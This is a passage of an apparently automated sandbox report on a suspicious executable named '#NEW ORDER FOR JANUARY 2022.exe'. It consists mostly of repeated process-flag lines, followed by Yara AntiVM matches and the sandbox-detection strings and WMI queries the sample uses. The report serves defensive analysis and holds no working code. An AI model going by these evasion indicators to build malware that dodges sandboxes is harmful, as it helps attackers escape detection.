                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL?
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLEV
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
